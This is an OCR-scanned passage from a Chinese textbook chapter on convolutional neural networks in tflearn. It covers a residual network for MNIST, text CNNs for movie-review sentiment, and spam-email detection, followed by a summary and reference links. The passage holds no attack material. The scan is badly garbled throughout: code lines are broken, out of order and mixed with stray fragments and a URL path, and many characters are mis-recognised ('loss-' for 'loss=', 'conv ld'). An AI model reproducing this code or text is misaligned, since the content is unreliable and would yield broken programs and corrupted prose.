组 装 余下 神经 网 络 : 







































































































































































net tflearn.residual bottleneck(net, 3, 16, 64) 

net tflearn.residual bottleneck (net, 1, 32, 128, downsample=True) 

net tflearn.residual bottleneck(net, 2, 32, 128) 

net tflearn.residual bottleneck(net, 1, 64, 256, downsample=True) 

net tflearn.residual bottleneck(net, 2, 64, 256) 

net = tflearn.batch normalization (net) 

net = tflearn.activation(net, 'relu') 

net = tflearn.global avg pool (net) 

net = tflearn.fully connected(net, 10, activation='softmax') 

net tflearn.regression(net, optimizer='momentum', 
loss-'categorical crossentropy', 
learning rate=0.1) 

3. 效 果 验 证 


训练 并 交叉 验证 效果 ， 准 确 率 达 到 了 99% 以 上 ， 非 常 不 错 : 








model - t 

















model. fi 





17.3 示例 : d 


P 


cog 
完整 演 7 


示 代 码 请 


1 数据 清洗 与 特征 化 


这 次 我 们 的 样本 依然 采用 Movie Review Data 数 据 集 
polarity dataset v2.0， 详 细 的 介绍 请 


Flearn.DNN (net, 


checkpoint path-'model resnet mnist', 





max checkpoints-10, tensorboard verbose-0) 


ARIS 


/ wre 





t(X, Y, n epoch-100, validation set-(testX, 
show metric-True, batch size-256, 


testY), 


run id-'resnet mnist') 





FIC 


见 本 书 GitHub 上 的 17-2.py。 


读 取 文 件 ， 把 每 个 文件 转换 成 一 个 字符 串 : 
































def load one file(fil 
x=" "Wo m 
with open(filename) 
for line in f 
xt-line 
return x 





遍历 读 取 文件 夹 下 全 部 文件 : 


def ] 








ename) : 





as 工 : 





list = 


files (rootdir, label): 
os.listdir (rootdir) 





y-l] 





for i in range(0, len(] 


ist)): 


Movie Review Data 数 据 集 包 含 1000 条 正面 评论 和 1000 条 负面 评论 ， 被 广泛 应 用 于 文本 分 类 尤 
参考 第 3 章 相 关内 容 。 


P 
i 


ath = 
f os.p 





os.path.join(rootdir, 


list[i]) 








ath.isfile (path): 











"Load file 
label) 


print 
y.append( 
x.append( 








Qon 
6S 


load one _ 


o 





file (pa 


$ pat 


th 





th) ) 


return x,y 


其 是 ; 7 STG SA, 
其 是 恶意 评论 


识别 方面 。 本 书 使 用 其 最 新 的 版 


Movie Review Data 数 据 集 的 每 条 评论 都 保存 成 单独 的 一 个 文本 文件 ， 正 面 和 负面 评论 放置 在 不 同 的 文件 夹 下 面 ， 使 用 词 袋 模型 将 文本 向 量化 。 





根据 不 同文 件 夹 ， 标 记 为 正面 和 负面 ， 其 中 正面 评论 标记 为 0， 负 面 评 论 标 记 为 1: 

















def load data(): 
x-[] 
=[] 
x1, yl=load_ 
X=xX1+x2 
y=y1+y2 








return x,y 


使 用 词 袋 模型 将 数据 向 量化 ， 并 且 使 用 train_test_split 将 样本 随机 


x, y-load data () 























x train, x test, y train, y test = train test split(x, y, test size-0.4, 

Vp = learn.preprocessing. VocabularyProcessor (max : document _length= =MAX DOCUM 
vp. fit (x) 

x train = np.array(list(vp.transform(x train) )) 

x test = np.array (list (vp.transform(x test) ) ) 

n words=len (vp. vocabulary ) 

print (‘Total words: $d' % n words) 





files ("http://www.hzcourse.com/resource/read 











Tle 

















构造 CNN， 使 用 一 维 卷 积 函数 : 





network - 


ne 

















input data (shape= 
twork tflearn.embedding 





MAX DOCUMENT 





[None, 








(network, 















































| LENGTH], name-'input') 
input dimen words+1, onepu 3 dim=128) 


东 集 (==) 合 和 测试 集合 1 分 配 比例 为 0. 4, 


random state=0) 








ENT LENGTH, min 















































branchl = conv_ld(network, 128, 3, padding- 'valid', activation-'relu', regularizer-"L2") 
branch2 = conv ld(network, 128, 4, padding-'valid', activation-'relu', regularizer="L2") 
branch3 = conv ld(network, 128, 5, padding-'valid', activation-'relu', regularizer="L2") 
network = merge ([branchl, branch2, branch3], mode-'concat', axis=1) 

network = tf.expand dims (network, 2) 

network — global max pool (network) 

network = dropout (network, 0.5) 

network — fully connected(network, 2, activation-'softmax') 

network = regression(network, optimizer-'adam', learning rate-0.001, 


3. 验 证 效果 


loss- 


'categorical crossentropy', name-'target') 


Book?path-/openresources/teach ebook/uncompressed/16472/0 





frequency-1) 


= 





I 





BPS/Text/../data/movie-review-data/review polarity/txt sentoker 





这 个 比例 可 以 根据 自己 的 需要 进行 调整 ， 





不 过 一 般 都 是 建议 使 用 40% 作 为 测试 数据 : 


CNN 算 法 在 fit 函 数 中 直接 指定 了 测试 数据 集合 (testX, testY) : 











model = tflearn.DNN(network, tensorboard Verbose=0) 
model.fit(trainX, trainY, n epoch = 10, shuffle-True, validation set-(testX, testY), show metric-True, batch size-32) 



































运行 程序 ， 准 确 率 66% 左 右 ， 比 之 前 NB 和 RNN 算 法 有 提升 。 


17.4 示例 : 识别 垃圾 邮件 


完整 演示 代码 请 见 本 书 GitHub 上 的 17-3.py。 
1 数据 清洗 与 特征 化 


CNN 的 诞生 是 为 了 解决 图 像 处 理 领 域 计 算 量 巨大 而 无 法 进行 深度 学 习 的 问题 ，CNN 通 过 卷 积 计算 、 池 化 等 方法 大 大 降低 了 计算 量 ， 同 时 识别 效果 还 满足 需求 。 图 像 通常 是 二 维 数组 ， 文 字 通 常 都 是 一 维 
数据 ， 是 否 可 以 通过 某 种 转换 后 ， 也 使 用 CNN 对 文字 进行 处 理 呢 ” 答案 是 肯定 的 。 


我 们 回顾 一 下 在 图 像 处 理 时 ，CNN 是 如 何 处 理 二 维 数据 的 。 如 图 17-6 所 示 ，CNN 使 用 二 维 卷 积 函数 处 理 小 块 图 像 ， 提 炼 高 级 特征 进一步 分 析 。 上 典型 的 二 维 卷 积 函 数 处 理 图 片 的 大 小 为 3x3、4x4 等 。 


Convolution Pooling Convolution Pooling Fully Fully Output Predictions 
Connected Connected 


~~~. dog(0.01) 
cat(0.04) 
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图 17-6 ”CNN 处 理 图 像 数 据 的 过 程 


同样 的 原理 ， 我 们 可 以 使 用 一 维 的 卷 积 国 数 处 理 文字 片段 ， 提 炼 高 级 特征 进一步 分 析 。 典 型 的 一 维 卷 积 国 数 处 理 文 字 片 段 的 大 小 为 3、4、5 等 ， 如 图 17-7 所 示 。 
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图 17-7 ”CNN 处 理 文本 数据 的 过 程 


感谢 Yoon Kim 的 经 上 典 论文 Convolutional Neural Networks for Sentence Classification 给 我 们 的 知识 。 常 见 的 词 袋 模型 可 以 很 好 地 表现 文本 由 哪些 单词 组 成 ， 但 是 却 无 法 表达 出 单词 之 间 的 前 后 关 
系 ， 于 是 人 们 借鉴 了 词 袋 模型 的 思想 ， 使 用 生成 的 词汇 表 对 原 有 句子 按照 单词 逐个 进行 编码 。TensorFlow 默 认 支 持 了 这 种 模型 : 














tf.contrib.learn.preprocessing.VocabularyProcessor (max document length, min frequency=0, 
vocabulary-None, 
tokenizer fn-None) 











其 中 各 个 参数 的 含义 为 : 

: max document length: ， 文 档 的 最 大 长 度 。 如 果 文 本 的 长 度 大 于 最 大 长 度 ， 那 么 它 会 被 剪 切 ， 反 之 则 用 0 填充 。 
: min_frequency， 词 频 的 最 小 值 ， 出 现 次 数 小 于 这 个 值 的 词 则 不 会 被 收录 到 词 表 中 。 

. vocabulary，CategoricalVocabulary 对 象 。 


: tokenizer fn, 4°74] % 3k. 


假设 有 如 下 句子 需要 处 理 : 


x text -[ 
"i love you', 
"me too' 


基于 以 上 句子 生成 词汇 表 ， 并 对 'i me too' 这 句 话 进行 编码 : 








vocab processor = learn.preprocessing.VocabularyProcessor (max document length) 





























vocab processor.fit(x text) 
print next(vocab processor.transform(['i me too'])).tolist() 
x = np.array(list(vocab processor.fit transform(x text))) 
print x 
运行 结果 为 
[1, 4, 5, 0] 
[[(12 3 0] 
[4-5 0°01] 


整个 过 程 如 图 17-8 所 示 。 





1love you 







me foo 


1me too 


图 17-8 ”使 用 词汇 表 模 型 进行 编码 


我 们 使 用 TensorFlow 自 带 的 VocabularyProcessor 对 数据 集 的 文本 进行 编码 转换 : 


ham, spam-load all files() 
x-hamtspam 
y-[0] *1en (ham) *[1]*len (spam) 

vp-tflearn.data utils.VocabularyProcessor (max document length-max document length, min frequency-0, vocabulary-None, tokenizer fn-None) 
x-vp.fit transform(x, unused y-None) 

x-np.array (list (x) ) 

return X,y 









































使 用 词汇 表 编 码 后 ， 将 数据 集合 随机 分 配 成 让 





练 集合 和 测试 集合 ， 其 中 测试 集合 比例 为 40%: 











x, y=get features by tf() 
X train, x test, y train, y test = train test split(x, y, test size = 0.4, random state = 0) 











将 让 





练 和 测试 数据 进行 填充 和 转换 ， 不 到 最 大 长 度 的 数据 填充 0， 由 于 是 二 分 类 问题 ， 把 标记 数据 二 值 化 。 定 义 输入 参数 的 最 大 长 度 为 文档 的 最 大 长 度 : 








trainX = pad sequences (trainX, maxlen=max document length, value=0.) 
testX = pad sequences (testX, maxlen-max document length, value=0.) 

4 Converting labels to binary vectors 

trainY = to categorical(trainY, nb classes-2) 

testY = to categorical(testY, nb classes-2) 

network = input data(shape-[None,max document length], name-'input') 























2. 训 





练 样本 


定义 CNN 模 型 ， 其 实 使 用 3 个 数量 为 128 核 ， 长 度 分 别 为 3、4、5 的 一 维 卷 积 函数 处 理 数 据 : 



















































































network = tflearn.embedding (network, input dim=1000000, output dim=128) 

branchl = conv ld(network, 128, 3, padding-'valid', activation-'relu', regularizer="L2") 
branch2 = conv ld(network, 128, 4, padding-'valid', activation-'relu', regularizer="L2") 
branch3 = conv ld(network, 128, 5, padding-'valid', activation-'relu', regularizer="L2") 
network = merge([branchl, branch2, branch3], mode-'concat', axis-1) 

network — tf.expand dims (network, 2) 

network — global max pool (network) 

network = dropout (network, 0.8) 

network = fully connected (network, 2, activation='softmax') 

network = regression (network, optimizer-'adam', learning rate-0.001, 








loss-'categorical crossentropy', name-'target') 





3. 验 证 效果 
实例 化 CNN 对 象 并 进行 训练 数据 ， 一 共 训练 5 轮 : 


model = tflearn.DNN(network, tensorboard verbose=0) 
model.fit(trainX, trainY, i 
n epoch-5, shuffle-True, validation set-(testX, testY), 
show metric-True, batch size-100,run id-"spam") 








CNN 的 结构 如 图 17-9 所 示 。 


在 我 的 mac 本 上 运行 了 近 3 个 小 时 后 ， 对 测试 数据 集 的 识别 准确 度 达 到 了 98.30%， 令 人 满意 : 


Training Step: 680 | total loss: 0.01691 | time: 2357.838s 
| Adam | epoch: 005 | loss: 0.01691 - acc: 0.9992 | val loss: 0.05177 - val acc: 0.9830 -- iter: 13524/13524 





17.5 “本 章 小 结 


本 章 重 点 介绍 CNN 的 基础 知识 以 及 Web 安 全 领域 的 相关 应 用 。CNN 不 仅 在 图 像 处 理 领 域 大 显 身 手 ， 而 且 在 文本 分 类 领域 具有 广泛 应 用 。 基 于 CNN 算 法 安全 领域 的 更 多 应 用 ， 还 等 着 大 家 去 发 据 。 关 于 
RNN 和 CNN 的 深度 介绍 和 案例 不 是 本 书 重点 ， 本 系列 书 的 第 二 部 将 重点 介绍 深度 学 习 及 其 应 用 ， 襄 请 关注 。 
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图 17-9 ”处 理 垃圾 邮件 的 CNN 结 构图 


我 写作 本 章 时 参考 了 以 下 网 站 ， 读 者 要 想 进 一 步 学 习 ， 欢 迎 到 这 些 网 站 进一步 了 解 更 多 信息 : 
- http://blog.csdn.net/stdcoutzyx/article/details/41596663 
: http://blog.csdn.net/u013713117/article/ details/69261769 
: https:/ /github.com/tfleatn/tflearn/blob/master/examples/nlp/ 
: http://blog.csdn.net/clayanddev /article/details/70738475 
“ http://www.wildml.com/2015/12/implementing-a-cnn-for-text-classification-in-tensorflow/ 
: http://www.36dsj.com/archives/24006 


“ http://www.imaotao.cn/a/WZ0518161GTOR8GQ? utm source-tuicool&utm medium- referral 


还 有 一 些 参考 文献 值得 一 读 : 
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